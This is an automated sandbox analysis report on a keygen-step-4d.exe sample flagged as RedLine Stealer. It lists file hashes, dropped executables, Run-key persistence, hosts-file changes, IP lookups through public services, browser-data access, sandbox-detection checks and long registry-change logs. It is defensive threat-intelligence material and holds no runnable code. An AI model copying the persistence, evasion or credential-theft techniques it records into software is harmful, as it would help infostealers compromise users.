Overview
overview
10Static
static
ﱞﱞﱞ�...ﱞﱞ
windows10_x64
10ﱞﱞﱞ�...ﱞﱞ
windows10_x64
10ﱞﱞﱞ�...ﱞﱞ
windows10_x64
10ﱞﱞﱞ�...ﱞﱞ
windows10_x64
10ﱞﱞﱞ�...ﱞﱞ
windows7_x64
8ﱞﱞﱞ�...ﱞﱞ
windows7_x64
10ﱞﱞﱞ�...ﱞﱞ
windows7_x64
10ﱞﱞﱞ�...ﱞﱞ
windows7_x64
10win102
windows10_x64
10win102
windows10_x64
10win102
windows10_x64
10win102
windows10_x64
10win104
windows10_x64
10win104
windows10_x64
10win104
windows10_x64
10win104
windows10_x64
10win105
windows10_x64
10win105
windows10_x64
10win105
windows10_x64
10win105
windows10_x64
10win106
windows10_x64
10win106
windows10_x64
10win106
windows10_x64
10win106
windows10_x64
10win103
windows10_x64
10win103
windows10_x64
10win103
windows10_x64
10win103
windows10_x64
10win101
windows10_x64
10win101
windows10_x64
10win101
windows10_x64
10win101
windows10_x64
10Resubmissions
12-11-2024 01:29
241112-bwgrxs1gnf 1008-07-2021 12:18
210708-8z6d5h8z2n 1006-07-2021 17:53
210706-g6we6sa7sa 1019-06-2021 18:17
210619-vr8bj2dzfn 1017-06-2021 21:39
210617-a9cvlnmrbx 1011-06-2021 17:26
210611-wvab1yw2tj 1008-06-2021 06:47
210608-qrbpch3y46 1008-06-2021 06:47
210608-64tndgm1ln 1005-06-2021 18:40
210605-cd6qpr55sx 1004-06-2021 11:56
210604-5c416rs3ns 10Analysis
-
max time kernel
60s -
max time network
1590s -
platform
windows10_x64 -
resource
win10v20210410 -
submitted
04-05-2021 15:44
Static task
static1
Behavioral task
behavioral1
Sample
Install.exe
Resource
win10v20210408
Behavioral task
behavioral2
Sample
Install2.exe
Resource
win10v20210408
Behavioral task
behavioral3
Sample
keygen-step-4.exe
Resource
win10v20210410
Behavioral task
behavioral4
Sample
keygen-step-4d.exe
Resource
win10v20210410
Behavioral task
behavioral5
Sample
Install.exe
Resource
win7v20210408
Behavioral task
behavioral6
Sample
Install2.exe
Resource
win7v20210410
Behavioral task
behavioral7
Sample
keygen-step-4.exe
Resource
win7v20210408
Behavioral task
behavioral8
Sample
keygen-step-4d.exe
Resource
win7v20210410
Behavioral task
behavioral9
Sample
Install.exe
Resource
win10v20210408
Behavioral task
behavioral10
Sample
Install2.exe
Resource
win10v20210410
Behavioral task
behavioral11
Sample
keygen-step-4.exe
Resource
win10v20210410
Behavioral task
behavioral12
Sample
keygen-step-4d.exe
Resource
win10v20210408
Behavioral task
behavioral13
Sample
Install.exe
Resource
win10v20210410
Behavioral task
behavioral14
Sample
Install2.exe
Resource
win10v20210408
Behavioral task
behavioral15
Sample
keygen-step-4.exe
Resource
win10v20210410
Behavioral task
behavioral16
Sample
keygen-step-4d.exe
Resource
win10v20210408
Behavioral task
behavioral17
Sample
Install.exe
Resource
win10v20210410
Behavioral task
behavioral18
Sample
Install2.exe
Resource
win10v20210408
Behavioral task
behavioral19
Sample
keygen-step-4.exe
Resource
win10v20210410
Behavioral task
behavioral20
Sample
keygen-step-4d.exe
Resource
win10v20210410
Behavioral task
behavioral21
Sample
Install.exe
Resource
win10v20210408
Behavioral task
behavioral22
Sample
Install2.exe
Resource
win10v20210410
Behavioral task
behavioral23
Sample
keygen-step-4.exe
Resource
win10v20210408
Behavioral task
behavioral24
Sample
keygen-step-4d.exe
Resource
win10v20210410
Behavioral task
behavioral25
Sample
Install.exe
Resource
win10v20210408
Behavioral task
behavioral26
Sample
Install2.exe
Resource
win10v20210410
Behavioral task
behavioral27
Sample
keygen-step-4.exe
Resource
win10v20210410
Behavioral task
behavioral28
Sample
keygen-step-4d.exe
Resource
win10v20210408
Behavioral task
behavioral29
Sample
Install.exe
Resource
win10v20210410
Behavioral task
behavioral30
Sample
Install2.exe
Resource
win10v20210408
Behavioral task
behavioral31
Sample
keygen-step-4.exe
Resource
win10v20210410
Behavioral task
behavioral32
Sample
keygen-step-4d.exe
Resource
win10v20210410
General
-
Target
keygen-step-4d.exe
-
Size
4.6MB
-
MD5
563107b1df2a00f4ec868acd9e08a205
-
SHA1
9cb9c91d66292f5317aa50d92e38834861e9c9b7
-
SHA256
bf2bd257dde4921ce83c7c1303fafe7f9f81e53c2775d3c373ced482b22eb8a9
-
SHA512
99a8d247fa435c4cd95be7bc64c7dd6e382371f3a3c160aac3995fd705e4fd3f6622c23784a4ae3457c87536347d15eda3f08aa616450778a99376df540d74d1
Malware Config
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 2 IoCs
resource yara_rule behavioral20/memory/4100-350-0x00000000004163C6-mapping.dmp family_redline behavioral20/memory/8140-352-0x00000000004163C6-mapping.dmp family_redline -
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Downloads MZ/PE file
-
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\system32\drivers\etc\hosts Ultra.exe -
Executes dropped EXE 31 IoCs
pid Process 2276 xiuhuali.exe 196 JoSetp.exe 804 Install.exe 732 Install.tmp 3984 Ultra.exe 8 ultramediaburner.exe 1788 ultramediaburner.tmp 2324 Joqypaezhyzhu.exe 4052 UltraMediaBurner.exe 3356 Saevyfolaedo.exe 4152 filee.exe 5116 jg6_6asg.exe 7532 gaoou.exe 7896 jfiag3g_gg.exe 5800 sskiper.exe 7120 KiffMainE1.exe 7368 1211179992.exe 8168 001.exe 6944 installer.exe 7940 gpooe.exe 4836 jfiag3g_gg.exe 6520 jfiag3g_gg.exe 6892 sskiper.exe 5784 1811090661.exe 4988 cmd.exe 6768 jfiag3g_gg.exe 6916 514700520.exe 7380 2069423122.exe 7604 askinstall39.exe 6000 y1.exe 5520 setup.exe -
resource yara_rule behavioral20/files/0x000100000001ac77-277.dat upx behavioral20/files/0x000100000001ac77-278.dat upx behavioral20/files/0x000100000001ac92-311.dat upx behavioral20/files/0x000100000001ac92-315.dat upx behavioral20/files/0x000100000001ac92-317.dat upx behavioral20/files/0x000100000001ac92-318.dat upx -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\International\Geo\Nation Joqypaezhyzhu.exe Key value queried \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\International\Geo\Nation keygen-step-4d.exe -
Loads dropped DLL 30 IoCs
pid Process 1276 rundll32.exe 732 Install.tmp 6944 installer.exe 6944 installer.exe 6944 installer.exe 6184 MsiExec.exe 6184 MsiExec.exe 5680 Conhost.exe 5680 Conhost.exe 5680 Conhost.exe 5680 Conhost.exe 5680 Conhost.exe 5680 Conhost.exe 5680 Conhost.exe 4104 rundll32.exe 5680 Conhost.exe 5680 Conhost.exe 5680 Conhost.exe 6944 installer.exe 5680 Conhost.exe 5680 Conhost.exe 5680 Conhost.exe 8096 MsiExec.exe 8096 MsiExec.exe 8096 MsiExec.exe 8096 MsiExec.exe 8096 MsiExec.exe 8096 MsiExec.exe 8096 MsiExec.exe 5680 Conhost.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Windows Sidebar\\Woluvonuwy.exe\"" Ultra.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.exe" gaoou.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA jg6_6asg.exe -
Enumerates connected drives 3 TTPs 48 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\T: installer.exe File opened (read-only) \??\X: installer.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\F: installer.exe File opened (read-only) \??\J: installer.exe File opened (read-only) \??\R: installer.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\E: installer.exe File opened (read-only) \??\M: installer.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\Y: installer.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\A: installer.exe File opened (read-only) \??\I: installer.exe File opened (read-only) \??\K: installer.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\P: installer.exe File opened (read-only) \??\Z: installer.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\N: installer.exe File opened (read-only) \??\O: installer.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\S: installer.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\H: installer.exe File opened (read-only) \??\L: installer.exe File opened (read-only) \??\Q: installer.exe File opened (read-only) \??\W: installer.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\B: installer.exe File opened (read-only) \??\G: installer.exe File opened (read-only) \??\U: installer.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\V: installer.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\K: msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 10 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 353 api.myip.com 538 ipinfo.io 540 ipinfo.io 59 ip-api.com 252 ipinfo.io 328 ip-api.com 355 api.myip.com 437 api.ipify.org 554 ipinfo.io 250 ipinfo.io -
Drops file in System32 directory 10 IoCs
description ioc Process File opened for modification C:\Windows\System32\Tasks\AdvancedWindowsManager #5 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat svchost.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies\0PO4RK9F.cookie svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies\0PO4RK9F.cookie svchost.exe File opened for modification C:\Windows\System32\Tasks\AdvancedWindowsManager #1 svchost.exe File opened for modification C:\Windows\System32\Tasks\AdvancedWindowsManager #2 svchost.exe File opened for modification C:\Windows\System32\Tasks\AdvancedWindowsManager #3 svchost.exe File opened for modification C:\Windows\System32\Tasks\AdvancedWindowsManager #4 svchost.exe File opened for modification C:\Windows\System32\Tasks\AdvancedWindowsManager #6 svchost.exe File opened for modification C:\Windows\System32\Tasks\AdvancedUpdater svchost.exe -
Suspicious use of SetThreadContext 4 IoCs
description pid Process procid_target PID 2256 set thread context of 4000 2256 svchost.exe 80 PID 2256 set thread context of 3056 2256 svchost.exe 85 PID 7368 set thread context of 4100 7368 1211179992.exe 142 PID 5784 set thread context of 8140 5784 1811090661.exe 147 -
Drops file in Program Files directory 18 IoCs
description ioc Process File created C:\Program Files\install.dat xiuhuali.exe File created C:\Program Files (x86)\UltraMediaBurner\unins000.dat ultramediaburner.tmp File opened for modification C:\Program Files (x86)\AW Manager\Windows Manager\Privacy.url msiexec.exe File created C:\Program Files\install.dll xiuhuali.exe File created C:\Program Files\Windows Media Player\UWGLYGLAGR\ultramediaburner.exe Ultra.exe File created C:\Program Files\Windows Media Player\UWGLYGLAGR\ultramediaburner.exe.config Ultra.exe File created C:\Program Files (x86)\UltraMediaBurner\is-2KGQC.tmp ultramediaburner.tmp File created C:\Program Files (x86)\UltraMediaBurner\is-5155H.tmp ultramediaburner.tmp File created C:\Program Files\libEGL.dll xiuhuali.exe File opened for modification C:\Program Files (x86)\UltraMediaBurner\unins000.dat ultramediaburner.tmp File created C:\Program Files (x86)\AW Manager\Windows Manager\Uninstall.lnk msiexec.exe File opened for modification C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.ini msiexec.exe File opened for modification C:\Program Files (x86)\AW Manager\Windows Manager\EULA.url msiexec.exe File opened for modification C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe ultramediaburner.tmp File created C:\Program Files (x86)\Windows Sidebar\Woluvonuwy.exe Ultra.exe File created C:\Program Files (x86)\Windows Sidebar\Woluvonuwy.exe.config Ultra.exe File created C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.exe msiexec.exe File created C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe msiexec.exe -
Drops file in Windows directory 34 IoCs
description ioc Process File opened for modification C:\Windows\Installer\MSIDCE0.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIDED6.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSID0A5.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSID377.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIE835.tmp msiexec.exe File opened for modification C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\SystemFoldermsiexec.exe msiexec.exe File opened for modification C:\Windows\Installer\MSIEBB5.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSICE90.tmp msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File opened for modification C:\Windows\Installer\MSIDF92.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIE98F.tmp msiexec.exe File opened for modification C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\logo.exe msiexec.exe File opened for modification C:\Windows\Installer\f74ccac.msi msiexec.exe File opened for modification C:\Windows\Installer\MSIDE38.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIE63E.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIE7B6.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIE865.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIEA3C.tmp msiexec.exe File created C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\logo.exe msiexec.exe File created C:\Windows\Installer\f74ccac.msi msiexec.exe File opened for modification C:\Windows\Installer\MSID22D.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIE34C.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIE35D.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIE38D.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIE7F6.tmp msiexec.exe File created C:\Windows\Installer\f74ccaf.msi msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File created C:\Windows\Installer\SourceHash{C845414C-903C-4218-9DE7-132AB97FDF62} msiexec.exe File opened for modification C:\Windows\Installer\MSID161.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSID2BB.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSID3E6.tmp msiexec.exe File created C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\SystemFoldermsiexec.exe msiexec.exe File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 22 IoCs
pid pid_target Process procid_target 9004 5996 WerFault.exe 297 8236 9136 WerFault.exe 323 6616 5996 WerFault.exe 297 8512 8540 WerFault.exe 305 8236 9136 WerFault.exe 323 9312 8540 WerFault.exe 305 9404 5996 WerFault.exe 297 9468 8880 WerFault.exe 333 9756 8540 WerFault.exe 305 9964 8880 WerFault.exe 333 7728 8540 WerFault.exe 305 9776 9136 WerFault.exe 323 9908 8540 WerFault.exe 305 10232 9136 WerFault.exe 323 9816 8540 WerFault.exe 305 7880 8880 WerFault.exe 333 9144 8540 WerFault.exe 305 8472 9136 WerFault.exe 323 9920 8880 WerFault.exe 333 9928 9136 WerFault.exe 323 7252 8880 WerFault.exe 333 7060 8880 WerFault.exe 333 -
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz svchost.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz svchost.exe -
Delays execution with timeout.exe 4 IoCs
pid Process 4832 timeout.exe 8396 timeout.exe 8632 timeout.exe 5124 timeout.exe -
Kills process with taskkill 8 IoCs
pid Process 4320 taskkill.exe 5980 taskkill.exe 6504 taskkill.exe 5736 taskkill.exe 5928 taskkill.exe 5052 taskkill.exe 6452 taskkill.exe 8084 taskkill.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main browser_broker.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdge.exe -
Modifies data under HKEY_USERS 19 IoCs
description ioc Process Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16 msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum 64-bit svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum 64-bit\Version = "7" svchost.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" svchost.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\16\52C64B7E msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17 msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie svchost.exe Key created \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" svchost.exe Key created \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache\16\52C64B7E svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix svchost.exe -
Modifies registry class 64 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\History\CachePrefix = "Visited:" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\DeviceId = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\CIPolicyState = "0" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\Favorites\Order = 0c0000000a000000000000000c0000000100000000000000 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\IntelliForms MicrosoftEdge.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\Version = "16777216" msiexec.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU MicrosoftEdge.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\PackageName = "Windows Manager - Postback Yonatan.msi" msiexec.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History MicrosoftEdgeCP.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\Language = "1033" msiexec.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TabbedBrowsing MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Extensible Cache MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify. = 01000000ea7e2984044a1ef6ac148407a730363dca68653f581c376cb9ed13b49fb537f8f2a98d04efe87791f2d764e0f75e01c43dd6d69fb6b62103b353 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Extensible Cache MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer\Main\OperationalData = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-DXFeatureLevel = "0" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus\DynamicCodePolicy = 00000000 MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\DXFeatureLevel = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies\CacheLimit = "1" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = a8596c16fc40d701 MicrosoftEdge.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\Net msiexec.exe Set value (data) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\SignaturePolicy = 06000000 MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CachePrefix = "Visited:" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\Favorites MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Revision = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TabbedBrowsing\NewTabPage MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url4 = "https://login.live.com/" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active\{87400338-FD42-4CBE-90EA-38CD2D9E468E} = "0" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus\DynamicCodePolicy = 05000000 